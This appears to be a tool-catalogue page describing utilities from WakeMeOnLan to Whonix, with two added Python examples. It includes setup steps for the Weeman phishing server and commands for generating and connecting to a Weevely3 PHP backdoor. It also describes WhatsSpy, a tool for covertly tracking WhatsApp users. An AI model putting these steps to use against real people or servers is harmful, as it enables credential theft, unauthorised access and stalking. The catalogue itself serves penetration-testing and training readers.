If you want to wake up all computers in a specific IP addresses range, you can use the /wakeupiprange command-line option.
Examples:
WakeMeOnLan.exe /wakeupiprange 192.168.0.25 192.168.0.100
WakeMeOnLan.exe /wakeupiprange 192.168.0.11 192.168.0.20 20000 192.168.0.255
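What the /wakeup option actually puts on the wire is a small fixed-format UDP datagram. The following is an added example (not WakeMeOnLan's code) that builds and parses that packet, accepting the three MAC spellings the /MacAddressFormat option lists, with the port and broadcast address as optional parameters like the command-line examples above. The packet layout (six 0xFF bytes followed by the MAC repeated 16 times, sent as a UDP broadcast, conventionally to port 9 or 7) is standard Wake-on-LAN and is not stated on the page.

```python
"""Build, send and recognise a Wake-on-LAN magic packet.

Added example; the MAC formats accepted are the three WakeMeOnLan can
display (XX-XX-XX-XX-XX-XX, XX:XX:XX:XX:XX:XX, XXXXXXXXXXXX). The sample
MAC used in the test is the one from the page's /wakeup examples.
"""
import re
import socket

_MAC_FORMS = (
    re.compile(r"^[0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5}$"),  # XX-XX-XX-XX-XX-XX
    re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$"),  # XX:XX:XX:XX:XX:XX
    re.compile(r"^[0-9A-Fa-f]{12}$"),                       # XXXXXXXXXXXX
)


def parse_mac(text: str) -> bytes:
    """Accept exactly the three display formats; reject anything else."""
    if not any(p.match(text) for p in _MAC_FORMS):
        raise ValueError(f"unrecognised MAC address: {text!r}")
    return bytes.fromhex(text.replace("-", "").replace(":", ""))


def magic_packet(mac: str) -> bytes:
    """6 x 0xFF synchronisation stream, then the MAC repeated 16 times (102 bytes)."""
    return b"\xff" * 6 + parse_mac(mac) * 16


def is_magic_packet(payload: bytes):
    """Return the target MAC (XX-XX-... form) if payload is a well-formed magic
    packet, else None. On the defending side this lets a capture of UDP payloads
    be triaged for WOL activity without trusting the port number, since the
    sender may use any port (the examples above use 20000 and 30000)."""
    if len(payload) < 102 or payload[:6] != b"\xff" * 6:
        return None
    mac = payload[6:12]
    if payload[6:102] != mac * 16:  # extra trailing bytes (SecureOn password) are allowed
        return None
    return "-".join(f"{b:02X}" for b in mac)


def wake(mac: str, port: int = 9, broadcast: str = "255.255.255.255") -> int:
    """Send the packet as a UDP broadcast; returns the number of bytes sent."""
    pkt = magic_packet(mac)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        return s.sendto(pkt, (broadcast, port))


if __name__ == "__main__":
    # Equivalent of: WakeMeOnLan.exe /wakeup 40-65-81-A7-16-23 20000 192.168.1.255
    print(wake("40-65-81-A7-16-23", 20000, "192.168.1.255"), "bytes sent")
```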
Scan Your Network From Command-Line

WakeMeOnLan allows you to scan your network and update the computers list in the .cfg file without displaying any user interface, by using the /scan command-line option:
WakeMeOnLan.exe /scan
You can also specify a specific IP addresses range to scan, for example:
WakeMeOnLan.exe /scan /UseIPAddressesRange 1 /IPAddressFrom 192.168.1.1 /IPAddressTo 192.168.1.254 /UseNetworkAdapter 0

More Command-Line Options

/IPAddressFrom <IP Address>    Specifies the IP address range to scan.
/IPAddressTo <IP Address>
/UseIPAddressesRange <0 | 1>   Specifies whether to scan with a specific IP addresses range (specified in the /IPAddressFrom and /IPAddressTo command-line options). 0 = No, 1 = Yes
/UseNetworkAdapter <0 | 1>     Specifies whether to scan the IP addresses range of the specified adapter (/NetworkAdapter). 0 = No, 1 = Yes
/NetworkAdapter <Name>         Specifies the network adapter name when /UseNetworkAdapter is 1.
/MacAddressFormat <1 | 2 | 3>  Specifies the MAC address format to display:
                               1 = XX-XX-XX-XX-XX-XX
                               2 = XX:XX:XX:XX:XX:XX
                               3 = XXXXXXXXXXXX
/UseNetBios <0 | 1>            Specifies whether to use NetBIOS scan. 0 = No, 1 = Yes
/cfg <Filename>                Start WakeMeOnLan with the specified configuration file. For example:
                               WakeMeOnLan.exe /cfg "c:\config\won.cfg"
                               WakeMeOnLan.exe /cfg "%AppData%\WakeMeOnLan.cfg"
/stext <Filename>              Save the list of computers that you previously scanned into a simple text file.
/stab <Filename>               Save the list of computers that you previously scanned into a tab-delimited text file.
/scomma <Filename>             Save the list of computers that you previously scanned into a comma-delimited text file (csv).
/stabular <Filename>           Save the list of computers that you previously scanned into a tabular text file.
/shtml <Filename>              Save the list of computers that you previously scanned into HTML file (Horizontal).
/sverhtml <Filename>           Save the list of computers that you previously scanned into HTML file (Vertical).
/sxml <Filename>               Save the list of computers that you previously scanned into XML file.
/sort <column>                 This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "Computer Name" and "Workgroup". You can specify the '~' prefix character (e.g: "~MAC Address") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
                               WakeMeOnLan.exe /shtml "c:\temp\WakeMeOnLan.html" /sort 2 /sort ~1
                               WakeMeOnLan.exe /shtml "c:\temp\WakeMeOnLan.html" /sort "Workgroup" /sort "Computer Name"
/nosort                        When you specify this command-line option, the list will be saved without any sorting.

Download WakeMeOnLan v1.71
WALDO - MULTITHREADED DIRECTORY AND SUBDOMAIN BRUTEFORCER

Waldo is a lightweight and multithreaded directory and subdomain bruteforcer implemented in Python. It can be used to locate hidden web resources and undiscovered subdomains of the specified target.

Key Features
Quickly and easily generate a list of all subdomains of a target domain
Discover hidden web resources that can be potentially leveraged as part of an attack
Written in Python and very portable
Fast, multithreaded design

Setup
Dependencies can be installed by running:
$ pip install -r pip.req

To run waldo:
$ python waldo.py

Usage
To enumerate subdomains at some-fake-site.example, execute the following:
$ python waldo.py -m s -d some-fake-site.example

To enumerate directories at some-fake-site.example, execute the following:
$ python waldo.py -m d -d some-fake-site.example

By default, output will be logged to waldo-output.txt. To specify a custom output file, use the -l flag:
$ python waldo.py -m s -l my-log-file.txt -d some-fake-site.example

Waldo uses 4 threads by default. To specify a custom threadpool size, use the -t flag:
$ python waldo.py -m s -d some-fake-site.example -t 15

Download Waldo
WAP - WEB APPLICATION PROTECTION

WAP is a source code static analysis and data mining tool to detect and correct input validation vulnerabilities in web applications written in PHP (version 4.0 or higher) with a low rate of false positives.
WAP detects and corrects the following vulnerabilities:
SQL Injection (SQLI)
Cross-site scripting (XSS)
Remote File Inclusion (RFI)
Local File Inclusion (LFI)
Directory Traversal or Path Traversal (DT/PT)
Source Code Disclosure (SCD)
OS Command Injection (OSCI)
PHP Code Injection

This tool semantically analyses the source code. More precisely, it does taint analysis (data-flow analysis) to detect the input validation vulnerabilities. The aim of the taint analysis is to track malicious inputs inserted at entry points ($_GET, $_POST arrays) and to verify whether they reach some sensitive sink (PHP functions that can be exploited by malicious input). After the detection, the tool uses data mining to confirm whether the vulnerabilities are real or false positives. At the end, the real vulnerabilities are corrected with the insertion of fixes (small pieces of code) into the source code.
WAP is written in the Java language and consists of three modules:

Code Analyzer: composed of the tree generator and the taint analyzer. The tool integrates a lexer and a parser generated by ANTLR, based on a grammar and a tree grammar written for the PHP language. The tree generator uses the lexer and the parser to build the AST (Abstract Syntax Tree) for each PHP file. The taint analyzer performs the taint analysis by navigating through the AST to detect potential vulnerabilities.

False Positives Predictor: composed of a supervised, trained data set with instances classified as being vulnerabilities or false positives, and of the Logistic Regression machine learning algorithm. For each potential vulnerability detected by the code analyzer, this module collects the presence of the attributes that define a false positive. Then, the Logistic Regression algorithm receives them and classifies the instance as being a false positive or not (a real vulnerability).

Code Corrector: each real vulnerability is removed by correction of its source code. For the type of vulnerability, this module selects the fix that removes the vulnerability and marks the places in the source code where the fix will be inserted. Then, the code is corrected with the insertion of the fixes and new files are created.

Download WAP
WATCHER V1.5.8 - WEB SECURITY TESTING TOOL AND PASSIVE VULNERABILITY SCANNER

Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won't damage production systems; it's completely safe to use in Cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

Major Features:
1. Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, CSS, and development frameworks (e.g. ASP.NET, JavaServer)
2. Works seamlessly with complex Web 2.0 applications while you drive the Web browser
3. Non-intrusive, will not raise alarms or damage production sites
4. Real-time analysis and reporting - findings are reported as they're found, exportable to XML, HTML, and Team Foundation Server (TFS)
5. Configurable domains with wildcard support
6. Extensible framework for adding new checks
Watcher is built as a plugin for the Fiddler HTTP debugging proxy available at www.fiddlertool.com. Fiddler provides all of the rich functionality of a good Web/HTTP proxy. With Fiddler you can capture all HTTP traffic, intercept and modify, replay requests, and much much more. Fiddler provides the HTTP proxy framework for Watcher to work in, allowing for seamless integration with today's complex Web 2.0 or Rich Internet Applications. Watcher runs silently in the background while you drive your browser and interact with the Web-application.
Watcher is built in C# as a small framework with 30+ checks already included. It's built so that new checks can be easily created to perform custom audits specific to your organizational policies, or to perform more general-purpose security assessments. Examples of the types of issues Watcher will currently identify:
ASP.NET VIEWSTATE insecure configurations
JavaServer MyFaces ViewState without cryptographic protections
Cross-domain stylesheet and javascript references
User-controllable cross-domain references
User-controllable attribute values such as href, form action, etc.
User-controllable javascript events (e.g. onclick)
Cross-domain form POSTs
Insecure cookies which don't set the HTTPOnly or secure flags
Open redirects which can be abused by spammers and phishers
Insecure Flash object parameters useful for cross-site scripting
Insecure Flash crossdomain.xml
Insecure Silverlight clientaccesspolicy.xml
Charset declarations which could introduce vulnerability (non-UTF-8)
User-controllable charset declarations
Dangerous context-switching between HTTP and HTTPS
Insufficient use of cache-control headers when private data is concerned (e.g. no-store)
Potential HTTP referer leaks of sensitive user-information
Potential information leaks in URL parameters
Source code comments worth a closer look
Insecure authentication protocols like Digest and Basic
SSL certificate validation errors
SSL insecure protocol issues (allowing SSL v2)
Unicode issues with invalid byte streams
Sharepoint insecurity checks
and more.

Reducing false positives is a high priority; suggestions are welcome. Right now each check takes steps to reduce false positives, some better than others, and checks can be individually disabled if they're generating too much noise.
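To make the passive model concrete, here is an added example (mine, not Watcher's C# code) that runs four of the checks listed above over one constructed HTTP response as a proxy would see it: cookies missing HttpOnly/Secure, a non-UTF-8 charset declaration, a Basic/Digest authentication challenge, and a cookie-setting response served without Cache-Control: no-store. The finding wording, and the rule that a response which sets cookies counts as carrying private data, are my assumptions.

```python
"""Passive response-header checks in the spirit of the Watcher list above.

Added example, not Watcher's code. Nothing is sent anywhere: the checks only
read a response that was already captured, which is what "passive" means.
"""
import re

# Constructed sample response, deliberately carrying several of the issues.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=ISO-8859-1\r\n"
    "Set-Cookie: JSESSIONID=abc123; Path=/\r\n"
    "Set-Cookie: theme=dark; Path=/; HttpOnly; Secure\r\n"
    "Cache-Control: private, max-age=0\r\n"
    'WWW-Authenticate: Basic realm="intranet"\r\n'
    "\r\n"
    "<html>...</html>"
)


def parse_headers(raw: str):
    """Return the status line and a list of (name, value) pairs, names lowercased.
    A list rather than a dict is used because Set-Cookie legitimately repeats."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def passive_checks(raw: str, https: bool = True) -> list:
    """Return a list of finding strings for one captured response."""
    _, headers = parse_headers(raw)
    findings = []

    # Check 1: cookie flags (Secure only matters when the site is served over TLS).
    cookies = [v for n, v in headers if n == "set-cookie"]
    for c in cookies:
        name = c.split("=", 1)[0]
        attrs = {a.strip().split("=")[0].lower() for a in c.split(";")[1:]}
        if "httponly" not in attrs:
            findings.append(f"cookie {name} lacks HttpOnly")
        if https and "secure" not in attrs:
            findings.append(f"cookie {name} lacks Secure")

    # Check 2: charset declaration on HTML responses.
    ctype = next((v for n, v in headers if n == "content-type"), "")
    m = re.search(r"charset=([\w-]+)", ctype, re.I)
    if "text/html" in ctype.lower():
        if not m:
            findings.append("HTML response declares no charset")
        elif m.group(1).lower() != "utf-8":
            findings.append(f"non-UTF-8 charset declared: {m.group(1)}")

    # Check 3: weak HTTP authentication schemes offered by the server.
    for v in (v for n, v in headers if n == "www-authenticate"):
        scheme = v.split()[0].lower()
        if scheme in ("basic", "digest"):
            findings.append(f"insecure authentication challenge: {scheme}")

    # Check 4: private (cookie-setting) responses should not be cacheable.
    if cookies:
        cc = next((v for n, v in headers if n == "cache-control"), "")
        if "no-store" not in cc.lower():
            findings.append("cookie-setting response without Cache-Control: no-store")
    return findings


if __name__ == "__main__":
    for f in passive_checks(SAMPLE_RESPONSE):
        print("-", f)
```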
RELEASE NOTES

Watcher.zip contains the two DLLs for manual installation of the plugin - drop them in your Fiddler2\Scripts user or program files folder.
WatcherSetup.exe is an installer built with NSIS that will copy the two DLLs into either your Fiddler2\Scripts user or program files folder.
WatcherTFS.zip contains the Team Foundation Server (TFS) component which Watcher uses to export results to TFS. Installation and further instructions are included in the ZIP file.

CHANGELOG
Program    Watcher Passive Web Security Tool for Fiddler
Version    1.5.8
Release    25-June-2013
License    Custom Open Source
Authors    Chris Weber
Testers    Chris Weber
Contact    chris@casaba.com
Website    http://websecuritytool.codeplex.com/
Company    http://www.casaba.com/
Copyright (c) 2010 - 2013 Casaba Security, LLC. All Rights Reserved.

+++ major new feature
+   minor new feature
*   changed feature
%   improved performance or quality
!   fixed minor bug
!!! fixed major bug

v1.5.8 2013-06-25
! Fixed bug in SSL certificate validation

Download Watcher v1.5.8
WEB SECURITY DOJO - TRAINING ENVIRONMENT FOR WEB APPLICATION SECURITY PENETRATION TESTING

A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo

What?

Various web application security testing tools and vulnerable web applications were added to a clean install of Ubuntu v10.04.2, which is patched with the appropriate updates and VM additions for easy use.

Why?

The Web Security Dojo is for learning and practicing web app security testing techniques. It is ideal for self-teaching and skill assessment, as well as training classes and conferences, since it does not need a network connection. The Dojo contains everything needed to get started: tools, targets, and documentation.

Feature Overview

Targets include:
OWASP's WebGoat
Google's Gruyere
Damn Vulnerable Web App
Hacme Casino
OWASP InsecureWebApp
w3af's test website
simple training targets by Maven Security (including REST and JSON)
Tools: (starred = new this version)
Burp Suite (free version)
w3af
sqlmap
arachni *
metasploit
Zed Attack Proxy *
OWASP Skavenger
OWASP Dirbuster
Paros
Webscarab
Ratproxy
skipfish
websecurify
davtest
J-Baah
JBroFuzz
Watobo *
RATS
helpful Firefox add-ons

Download Web Security Dojo

WEEMAN - HTTP SERVER FOR PHISHING

HTTP server for phishing in Python. Weeman has support for most of the (biggest) websites.
Usually you will want to run Weeman with a DNS spoof attack (see dsniff, ettercap).
Weeman will do the following steps:
1. Create fake html page.
2. Wait for clients.
3. Grab the data (POST).
4. Try to login the client to the original page.

Requirements
Python <= 2.7.
Python BeautifulSoup 4

Install BeautifulSoup
Archlinux - sudo pacman -S python2-beautifulsoup4
Ubuntu/Linuxmint - sudo apt-get install python-bs4
For another OS: - sudo pip install beautifulsoup4

Platforms
Linux (any)
Mac (Not tested)
Windows (Not tested)
[!] If weeman runs on your platform (Mac/Windows), please let me know.

Usage
Just type help
Run server:
For port 80 you need to run Weeman as root!

Host to clone (Ex: www.social-networks.local)
set url http://localhost

<form action="TAKE THIS URL"> (View the site source and take the URL)
set action_url http://localhost/sendlogin

The port the Weeman server will listen on
set port 2020

Start the server
run

The settings will be saved for the next time you run weeman.py.

Download Weeman
WEEVELY3 - WEAPONIZED WEB SHELL

Weevely is a command line web shell dynamically extended


over the network at runtime designed for remote administration
and pen testing. It provides a weaponized telnet-like console

through a PHP script running on the target, even in restricted


environments.
The low footprint agent and over 30 modules shape an
extensible framework to administrate, conduct a pen-test, postexploit, and audit remote web accesses in order to escalate
privileges and pivot deeper in the internal networks.
Feature:

Shell/PHP telnet-like network terminal


Common server misconfigurations auditing
SQL console pivoting on target
HTTP traffic proxying through target
Mount target file system to local mount point
Conduct network scans pivoting on target
File upload and download
Spawn reverse and direct TCP shells
Bruteforce services accounts
Compress and decompress zip, gzip, bzip2 and tar
archives

The backdoor agent

The remote agent is a very low footprint php script that receives
dynamically injected code from the client, extending the client
functionalities over the network at run-time. The agent code is
polymorphic and hardly detectable by AV and HIDS. The
communication is covered and obfuscated within the HTTP
protocol using steganographic techniques.
Modules development

Weevely also provides a python API which can be used to develop your own module to implement an internal audit, account enumerator, sensitive data scraper, network scanner, make the modules work as an HTTP or SQL client and do a whole lot of other cool stuff.
Installation

Linux
The following example runs on Debian/Ubuntu derived Linux environments with Python version 2.7.
# Make sure that the python package manager and yaml libraries are installed
$ sudo apt-get install g++ python-pip libyaml-dev python-dev
# Install requirements
$ sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

OS X
The following example runs on OS X with the Macports packaging system.
$ sudo port install python27 py27-pip
$ sudo port select --set pip pip27
$ sudo port select --set python python27
# Ideally, at this point you should install the editline library (http://thrysoee.dk/editline/)
# to have a working line completion in terminal. See issue #7 for more info.
$ sudo pip install prettytable Mako PyYAML python-dateutil readline PySocks --upgrade

Windows
The following example runs on Microsoft Windows 7 with Python version 2.7, and likely on other Windows versions. First of all, install Python 2.7 and the pip package manager using ez_setup.py as explained in this guide.
# Enter a folder which allows to call pip.exe, usually C:\Python27\Scripts\ with no %PATH% set, and
# install the following requirements
> pip install prettytable Mako PyYAML python-dateutil pyreadline PySocks --upgrade

Generate the backdoor agent

Weevely client communicates to the PHP agent installed into the target. Run ./weevely.py to print help.
$ ./weevely.py
[+] weevely 3.0
[!] Error: too few arguments
[+] Run terminal to the target
weevely <URL> <password>
[+] Load session file
weevely session <path>
[+] Generate backdoor agent
weevely generate <password> <path>

To generate a new agent, just use the generate option passing the password and path arguments.
$ ./weevely.py generate mypassword agent.php
Generated backdoor with password 'mypassword' in 'agent.php' of 1469 byte size.

Then, upload the generated agent under the target web folder.
Make sure that the agent PHP script is properly exposed and
executable through the web server.
Connect to the agent

Launch the weevely script to connect to the remote agent.
$ ./weevely.py http://target/agent.php mypassword
weevely>

The first prompt weevely> is still not connected, to allow users to set any useful pre-connection option, e.g. set proxies to be used. Running a real command automatically starts the session on the remote target.
weevely> ls
agent.php
index.html
joomla-3.2.1
www-data@target:/var/www $ cd ..
www-data@target:/var/ $ whoami
www-data
www-data@target:/var/ $ uname -a
Linux ubuntu 3.2.0-65-generic 99-Ubuntu SMP Fri Jul 4
21:04:27 UTC 2014 i686 i686 i386 GNU/Linux
www-data@target:/var/ $

Download Weevely3
WFUZZ - THE WEB APPLICATION BRUTEFORCER

Wfuzz is a tool designed for bruteforcing Web Applications. It can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforcing GET and POST parameters for checking different kinds of injections (SQL, XSS, LDAP, etc), bruteforcing form parameters (User/Password), fuzzing, etc.
Some features

Multiple injection points capability with multiple dictionaries
Recursion (when doing directory bruteforce)
Post, headers and authentication data brute forcing
Output to HTML
Colored output
Hide results by return code, word numbers, line numbers, regex.
Cookies fuzzing
Multi threading
Proxy support
SOCKS support
Time delays between requests
Authentication support (NTLM, Basic)
All parameters bruteforcing (POST and GET)
Multiple encoders per payload
Payload combinations with iterators
Baseline request (to filter results against)
Brute force HTTP methods
Multiple proxy support (each request through a different proxy)
HEAD scan (faster for resource discovery)
Dictionaries tailored for known applications (Weblogic, Iplanet, Tomcat, Domino, Oracle 9i, Vignette, Coldfusion and many more). Many dictionaries are from Darkraver's Dirb, www.open-labs.org.

Payloads

File
List
hexrand
range
names
hexrange

Encodings

random_uppercase
urlencode
binary_ascii
base64
double_nibble_hex
uri_hex
sha1
md5
double_urlencode
utf8
utf8_binary
html
html decimal
custom
many more...

Iterators

Product
Zip
Chain

Download Wfuzz
WHATSSPY - TRACE THE MOVES OF A WHATSAPP USER

WhatsSpy Public is a web-oriented application that tracks every move of whoever you like to follow. This application is set up as a Proof of Concept that Whatsapp is broken in terms of privacy. Once you've set up this application you can track users that you want to follow on Whatsapp. Once it's running it keeps track of the following activities:
Online/Offline status (even with privacy options set to "nobody")
Profile pictures
Privacy settings
Status messages
I made this project for you to realise how broken the privacy options actually are. It just started out as experimenting with Whatsapp to build a Bot, but I was stunned when I realised someone could abuse this "online" feature of Whatsapp to track anyone. I could just say this in like a blog article (like I tried but got marked as spam) that the privacy options are broken, but you wouldn't realise the impact it actually has.
Requirements

Shortlist requirements:
Secondary Whatsapp account (phone number that doesn't use Whatsapp)
Rooted Android phone OR Jailbroken iPhone OR PHP knowledge
Server/RPi that runs 24/7
Nginx or Apache with PHP with PDO (php5-pgsql installed) (you can't host on a simple webhoster, you need bash)
Postgresql
Notice

WhatsSpy Public requires a secondary Whatsapp account. Once the tracker is started, you will not be able to receive any messages over Whatsapp for this phone number. You can either try to register a phone number not used with Whatsapp with for example this script, or just buy a 5 euro SIM card and use this phone number for the tracker.
For the tracker to work you need a secret which is retrieved from either your phone or the register script mentioned above. In case of phone registration you need a jailbroken iPhone or rooted Android device in order to retrieve the secret.
Jailbroken iPhone users: You can retrieve it using this script.
Rooted Android phones can use the following APK to retrieve the secret.
In order to retrieve the secret you need to follow these steps:
Insert your (new) secondary SIM card in your phone and boot it up.
Re-install Whatsapp on your phone and activate it using the new phone number.
Use either the APK (Android) or the script (iPhone) to retrieve the WhatsApp secret. Write this secret down, which is required later.
Insert your normal SIM card and re-install WhatsApp for normal use.

Download WhatsSpy
WHONIX V11 - ANONYMOUS OPERATING SYSTEM

Whonix is an operating system focused on anonymity, privacy and security. It's based on the Tor anonymity network, Debian GNU/Linux and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user's real IP.
Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible.

Whonix for Qubes
https://www.whonix.org/wiki/Qubes
Whonix for KVM
https://www.whonix.org/wiki/KVM
Whonix for VirtualBox
https://www.whonix.org/wiki/VirtualBox
If you want to upgrade an existing Whonix version using Whonix's APT repository, special instructions are required:
https://www.whonix.org/wiki/Upgrading_Whonix_10_to_Whonix_11
Changelog between Whonix 10.0.0.5.5 and Whonix 11.0.0.2.3:
fixed custom workstation build
build script: refactoring, use errtrace rather than many traps https://phabricator.whonix.org/T48
build script: refactoring, use exit trap to reduce code duplication https://phabricator.whonix.org/T269
whonixcheck: warn if whonix-gateway / whonix-workstation package is not installed https://phabricator.whonix.org/T264
whonixcheck: warn if there is low entropy https://phabricator.whonix.org/T202
build, anon-apt-sources-list, anon-shared-build-apt-sources-tpo, whonix-repository: changed release codename from wheezy to jessie https://phabricator.whonix.org/T270
grub-enable-apparmor: Refactoring. Simplified for Debian jessie. Thanks to the new `/etc/default/grub.d` configuration folder, the `grub-enable-apparmor` has been greatly simplified. No longer need to config-package-dev divert `/etc/default/grub`.
genmkfile: if debuild not available, recommend installation of the devscripts package
build script: added fakeroot to whonix_build_script_build_dependency (required for verifiable builds)
genmkfile: fix, do not set automatically make_use_gain_root_command to true if fakeroot is not installed
genmkfile: run dpkg-checkbuilddeps before lintian to show better hint if build dependencies are missing
build script: build-steps.d/1200_create-debian-packages: commented out get_extra_packages, no longer need to download packages from testing
build script: refactoring, created separate help step, help-steps/git_sanity_test
whonixcheck: verbose output for check_tor_socks_port_reachability
all packages: packaging, bumped Standards-Version from 3.9.4 to 3.9.6 for jessie support
lintian warning copyright fix
tb-updater: show "highest version number is not necessarily the best one" message also on first run if no Tor Browser is installed yet https://phabricator.whonix.org/T283
build script: No longer install acpi-support-base by default on jessie, because systemd now implements that functionality. https://phabricator.whonix.org/T284
whonixcheck: added link to Whonix Build Version documentation https://www.whonix.org/wiki/Whonixcheck#Whonix_Build_Version https://phabricator.whonix.org/T276
build script: Fix commit 287bdcf6ddee007ba579e3ee9a1997edc8188581 makefile: added pedantic to default DEBUILD_LINTIAN_OPTS because we are going to fix the last remaining missing upstream changelog warning, added pedantic help-steps/variables.
all packages: added debian/source/lintian-overrides with debian-watch-may-check-gpg-signature to fix lintian warning https://phabricator.whonix.org/T277
whonix-setup-wizard, anon-gw-anonymizer-config, whonixcheck, whonix-ws-start-menu-additions, whonix-host-firewall: added Keywords= to .desktop files to fix lintian warning desktop-entry-lacks-keywords-entry https://phabricator.whonix.org/T281
anon-shared-helper-scripts: replaced dependency python-support (>= 0.90) with dh-python to fix lintian warning
control-port-filter-python: packaging, use debhelper with python2 to fix lintian warning
modify apt-get parameters during build to prevent need to remove apt-listchanges https://phabricator.whonix.org/T282
build-script: refactoring, moved variables DEBIAN_FRONTEND DEBIAN_PRIORITY DEBCONF_NOWARNINGS APT_LISTCHANGES_FRONTEND from help-steps/variables to buildconfig.d/30_apt_opts
genmkfile: hint "Is the build dependency genmkfile installed?" if genmkfile is not installed
genmkfile: hint "dpkg-parsechangelog not found. Do you have the build-essential package installed?" if dpkg-parsechangelog is not available
sdwdate: removed dependency on ruby1.9.1-dev to fix lintian warning "E: sdwdate: depends-on-obsolete-package depends: ruby1.9.1-dev"
whonixcheck: show diagnostic message on whonixcheck Whonix News gpg verification failure by default
build script: Fix building Whonix on Whonix, fix if `lsb_release --short -i` returns Whonix. Temp hack export whonix_build_on_operating_system=debian no longer required. Thanks to @nrgaway for the bug report and the analysis. https://phabricator.whonix.org/T278
tb-updater: tbbversion_installed parser fix
anon-meta-packages: removed dependency on libupower-glib1 which is no longer available in Debian jessie (it has been replaced by upower, which already gets installed)
anon-base-files, whonix-developer-meta-files: implemented WHONIX_BUILD_QUBES=true environment variable support https://phabricator.whonix.org/T298
anon-meta-packages: whonix-gateway and whonix-workstation package no longer depend on anon-shared-build-fix-grub because it has been made a weak dependency for better physical isolation and Qubes support
code simplification, removed support for environment variable ANON_BUILD_INSTALL_TO_ROOT=true because anon-shared-build-fix-grub now gets only installed on required platforms
implemented build parameter --unsafe-io true, that speeds up builds, that uses -o Dpkg::Options::=--force-unsafe-io, eatmydata and ignores sync. Thanks to @nrgaway for the suggestion! https://phabricator.whonix.org/T295
implemented $apt_misc_opts https://phabricator.whonix.org/T295
whonixcheck: new verbose debug feature, showing output of systemd-detect-virt
vbox-disable-timesync: more robust implementation that is compatible with systemd https://phabricator.whonix.org/T106
timesync: compatibility with systemd https://phabricator.whonix.org/T106
whonixcheck, msgdispatcher: ported to systemd https://phabricator.whonix.org/T106
qubes-whonix: skip rads on Qubes https://phabricator.whonix.org/T306
systemd unit files: workaround/fix, removed spaces from "WantedBy = ", likely bug in deb-systemd-helper that prevents enabling the service by default https://phabricator.whonix.org/T316
created a hellodaemon package, useful for Debian systemd packaging debugging, not part of Whonix https://github.com/adrelanos/hellodaemon
whonixcheck: debian/control: fix, added to Build-Depends: ruby-ronn (>= 0.7.3)
disable torsocks warning spam https://phabricator.whonix.org/T317
whonix-libvirt: fixed CI builds
whonix-libvirt: added driver name=qemu. Thanks to HulaHoop! https://github.com/Whonix/whonix-libvirt/pull/20 https://github.com/Whonix/whonix-libvirt/pull/19 https://github.com/Whonix/whonix-libvirt/pull/18
anon-meta-packages: added obfs4proxy to anon-gateway-packages-recommended https://phabricator.whonix.org/T323
anon-meta-packages: added apt-transport-tor to anon-shared-packages-recommended https://phabricator.whonix.org/T92
whonix-gw-network-conf, whonix-ws-network-conf: Removed pre-up /usr/bin/whonix_firewall; /etc/network/if-pre-up.d is now used to load the firewall, because the Debian upstream bug "interface comes up even if a script in /etc/network/if-pre-up.d/ fails" http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=700811 was fixed. https://phabricator.whonix.org/T68
whonix-gw-firewall, whonix-ws-firewall, whonix-host-firewall: Made package more standalone. Requiring pre-up /usr/bin/whonix_firewall in /etc/network/interfaces is no longer necessary. Added etc/network/if-pre-up.d/30_whonix_firewall to load the firewall, because the Debian upstream bug "interface comes up even if a script in /etc/network/if-pre-up.d/ fails" http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=700811 was fixed. https://phabricator.whonix.org/T68
whonixsetup, whonix-setup-wizard: fix "Tor fails after reload" related to torrc DisableNetwork setting issue by only restarting Tor, no longer trying to reload Tor https://phabricator.whonix.org/T320
rads: Improved implementation. When there is enough RAM: On enter: instantly start login manager. On ctrl + c: instantly abort and do not start login manager. On timeout: start login manager. Thanks to dh_systemd_start --no-start we can now use StandardInput=tty and read instead of systemd-ask-password. Now we could even implement an interactive menu at boot (that allows to configure wait time and/or disabling rads). https://phabricator.whonix.org/T57
whonixcheck: abolished random wait by default https://phabricator.whonix.org/T299
anon-ws-disable-stacked-tor: fixed "insserv: script tor.anondist-orig: service tor already provided!" warning during upgrades https://phabricator.whonix.org/T303
anon-ws-disable-stacked-tor: systemd compatibility https://phabricator.whonix.org/T303
anon-base-files: no longer set -o pipefail in /usr/lib/pre.bsh. config-package-dev doesn't like set -o pipefail http://mailman.mit.edu/pipermail/config-package-dev/2015-May/000041.html https://phabricator.whonix.org/T329
upstream bug report: spaces in Tor's systemd unit file causes issues https://trac.torproject.org/projects/tor/ticket/16162
upstream bug report: Tor dies on reload when switching to DisableNetwork 0 when using DnsPort 127.0.0.1:53 https://trac.torproject.org/projects/tor/ticket/16161
build script: fix, support verifiable false (was verifiable minimal while build documentation said false)
uwt: multi user fix https://www.whonix.org/forum/index.php/topic,1267
Qubes: WiFi Realtek RTL8191SEvB Issue and Solution https://groups.google.com/forum/#!topic/qubes-users/kMGTSwP72aU
whonix-setup-wizard API proposal: https://www.whonix.org/wiki/Dev/whonixsetup

Download Whonix v11
